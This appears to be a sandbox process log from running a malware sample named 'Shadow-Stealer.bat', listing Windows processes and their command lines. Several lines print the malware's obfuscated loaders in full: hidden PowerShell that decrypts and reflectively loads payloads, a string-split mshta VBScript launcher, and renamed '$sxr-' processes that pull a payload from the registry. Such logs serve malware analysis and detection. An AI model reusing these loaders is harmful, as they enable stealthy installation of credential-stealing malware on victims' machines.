C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5b0b2b69-7264-4637-9a9f-641bccea46a2}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{90a5ed3d-9d35-4845-ad94-9792d6a8b103}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{34da9efd-bc13-45a5-9d1a-5be862586030}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{be0e7d18-2e6c-4e3a-90c8-b7afba5aa508}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3376).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join 
'').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5194bba6-089c-407d-961a-c0a6163ad991}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{96c33985-81e6-4e05-9bbe-da1980776803}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{159c1918-d815-4e9a-b657-4504d0c9c6b0}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{dde74d24-75e2-4b87-92ce-3f3e0102344f}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2892 -ip 2892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 156

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{7614eb74-0942-4b90-9c42-88b23fff0a53}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{bf6b6f95-deda-4803-b2a0-5aa1592b2deb}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5480 -ip 5480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 476

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{8f615197-7f83-426f-bcb7-797e9a5d7bcc}

